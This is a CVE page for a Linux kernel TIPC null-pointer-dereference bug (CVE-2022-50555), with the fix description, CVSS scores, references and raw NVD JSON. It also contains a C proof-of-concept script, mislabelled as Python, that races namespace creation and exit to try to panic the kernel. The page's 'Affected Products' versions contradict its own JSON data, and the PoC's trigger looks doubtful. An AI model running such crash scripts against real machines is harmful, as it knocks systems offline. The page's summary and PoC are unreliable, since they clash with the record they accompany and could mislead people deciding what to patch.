CVE-2022-50555

Description

In the Linux kernel, the following vulnerability has been resolved: tipc: fix a null-ptr-deref in tipc_topsrv_accept syzbot found a crash in tipc_topsrv_accept: KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f] Workqueue: tipc_rcv tipc_topsrv_accept RIP: 0010:kernel_accept+0x22d/0x350 net/socket.c:3487 Call Trace: <TASK> tipc_topsrv_accept+0x197/0x280 net/tipc/topsrv.c:460 process_one_work+0x991/0x1610 kernel/workqueue.c:2289 worker_thread+0x665/0x1080 kernel/workqueue.c:2436 kthread+0x2e4/0x3a0 kernel/kthread.c:376 ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306 It was caused by srv->listener that might be set to null by tipc_topsrv_stop() in net .exit whereas it's still used in tipc_topsrv_accept() worker. srv->listener is protected by srv->idr_lock in tipc_topsrv_stop(), so add a check for srv->listener under srv->idr_lock in tipc_topsrv_accept() to avoid the null-ptr-deref. To ensure the lsock is not released during the tipc_topsrv_accept(), move sock_release() after tipc_topsrv_work_stop() where it's waiting until the tipc_topsrv_accept worker to be done. Note that sk_callback_lock is used to protect sk->sk_user_data instead of srv->listener, and it should check srv in tipc_topsrv_listener_data_ready() instead. This also ensures that no more tipc_topsrv_accept worker will be started after tipc_conn_close() is called in tipc_topsrv_stop() where it sets sk->sk_user_data to null.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.15.61

Linux Kernel 5.16.x < 5.16.18

Linux Kernel 5.17.x < 5.17.1

Linux Kernel 5.18.x < 5.18.1

Linux Kernel 5.19-rc1 ~ 5.19-rc4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2022-50555 PoC - Trigger null pointer dereference in tipc_topsrv_accept
// This PoC demonstrates how to trigger the race condition between
// tipc_topsrv_stop() and tipc_topsrv_accept()

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/tipc.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sched.h>
#include <errno.h>

#define TIPC_CLUSTER_ID 1
#define TIPC_NODE_ID 0x12345678

// Create a TIPC socket
int create_tipc_socket(void) {
    int fd = socket(AF_TIPC, SOCK_SEQPACKET, 0);
    if (fd < 0) {
        perror("socket creation failed");
        return -1;
    }
    return fd;
}

// Bind TIPC socket to trigger topsrv initialization
int bind_tipc_socket(int fd) {
    struct sockaddr_tipc addr;
    memset(&addr, 0, sizeof(addr));
    addr.family = AF_TIPC;
    addr.addrtype = TIPC_ADDR_NAMESEQ;
    addr.addr.nameseq.type = 0;  // Service type 0 triggers topsrv
    addr.addr.nameseq.lower = 1;
    addr.addr.nameseq.upper = 1;
    addr.scope = TIPC_CLUSTER_SCOPE;

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind failed");
        return -1;
    }
    return 0;
}

// Trigger network namespace exit to call tipc_topsrv_stop()
// while tipc_topsrv_accept() worker is still running
int trigger_namespace_exit(void) {
    pid_t pid = fork();
    if (pid == 0) {
        // Child: create new namespace and exit quickly
        if (unshare(CLONE_NEWNET) < 0) {
            perror("unshare failed");
            exit(1);
        }
        // Trigger TIPC initialization in new namespace
        int fd = create_tipc_socket();
        if (fd >= 0) {
            bind_tipc_socket(fd);
            close(fd);
        }
        // Exit namespace quickly to trigger tipc_topsrv_stop()
        // while accept worker may still be processing
        _exit(0);
    }
    return pid;
}

int main(int argc, char *argv[]) {
    printf("CVE-2022-50555 PoC - TIPC null pointer dereference\n");
    printf("Attempting to trigger race condition in tipc_topsrv_accept...\n");

    // Repeatedly trigger namespace creation/exit to increase
    // probability of race condition
    for (int i = 0; i < 100; i++) {
        pid_t pid = trigger_namespace_exit();
        if (pid > 0) {
            int status;
            waitpid(pid, &status, 0);
        }
        usleep(1000);  // Small delay between attempts
    }

    printf("PoC execution completed. Check dmesg for kernel panic.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50555
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50555
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50555/
[4] VulDB https://vuldb.com/cve/CVE-2022-50555
[5] https://git.kernel.org/stable/c/24b129aed8730e48f47d852d58d76825ab6f407c
[6] https://git.kernel.org/stable/c/32a3d4660b34ce49ac0162338ebe362098e2f5df
[7] https://git.kernel.org/stable/c/7a939503fc32bff4ed60800b73ff7fbb4aea2142
[8] https://git.kernel.org/stable/c/82cb4e4612c633a9ce320e1773114875604a3cce
[9] https://git.kernel.org/stable/c/ce69bdac2310152bb70845024d5d704c52aabfc3
[10] https://git.kernel.org/stable/c/cedb41664e27b2cae7e21487f1bee22dcd84037d

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50555", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:43.850", "lastModified": "2026-02-05T15:01:48.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix a null-ptr-deref in tipc_topsrv_accept\n\nsyzbot found a crash in tipc_topsrv_accept:\n\n KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]\n Workqueue: tipc_rcv tipc_topsrv_accept\n RIP: 0010:kernel_accept+0x22d/0x350 net/socket.c:3487\n Call Trace:\n <TASK>\n tipc_topsrv_accept+0x197/0x280 net/tipc/topsrv.c:460\n process_one_work+0x991/0x1610 kernel/workqueue.c:2289\n worker_thread+0x665/0x1080 kernel/workqueue.c:2436\n kthread+0x2e4/0x3a0 kernel/kthread.c:376\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306\n\nIt was caused by srv->listener that might be set to null by\ntipc_topsrv_stop() in net .exit whereas it's still used in\ntipc_topsrv_accept() worker.\n\nsrv->listener is protected by srv->idr_lock in tipc_topsrv_stop(), so add\na check for srv->listener under srv->idr_lock in tipc_topsrv_accept() to\navoid the null-ptr-deref. To ensure the lsock is not released during the\ntipc_topsrv_accept(), move sock_release() after tipc_topsrv_work_stop()\nwhere it's waiting until the tipc_topsrv_accept worker to be done.\n\nNote that sk_callback_lock is used to protect sk->sk_user_data instead of\nsrv->listener, and it should check srv in tipc_topsrv_listener_data_ready()\ninstead. This also ensures that no more tipc_topsrv_accept worker will be\nstarted after tipc_conn_close() is called in tipc_topsrv_stop() where it\nsets sk->sk_user_data to null."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.17", "versionEndExcluding": "4.19.264", "matchCriteriaId": "09C4D37C-A518-40EC-BBAC-23AE3A97FF35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.223", "matchCriteriaId": "7FE3F72A-5992-4ABB-A961-F834281060A9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.153", "matchCriteriaId": "62052E35-0E91-4164-BB92-83270CEA0113"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.77", "matchCriteriaId": "756161DE-EFE3-4008-964A-DFE360B188B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.7", "matchCriteriaId": "65D387F0-209C-4EAD-98BA-C4B430A840C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/24b129aed8730e48f47d852d58d76825ab6f407c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/32a3d4660b34ce49ac0162338ebe362098e2f5df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a939503fc32bff4ed60800b73ff7fbb4aea2142", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/82cb4e4612c633a9ce320e1773114875604a3cce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ce69bdac2310152bb70845024d5d704c52aabfc3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cedb41664e27b2cae7e21487f1bee22dcd84037d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}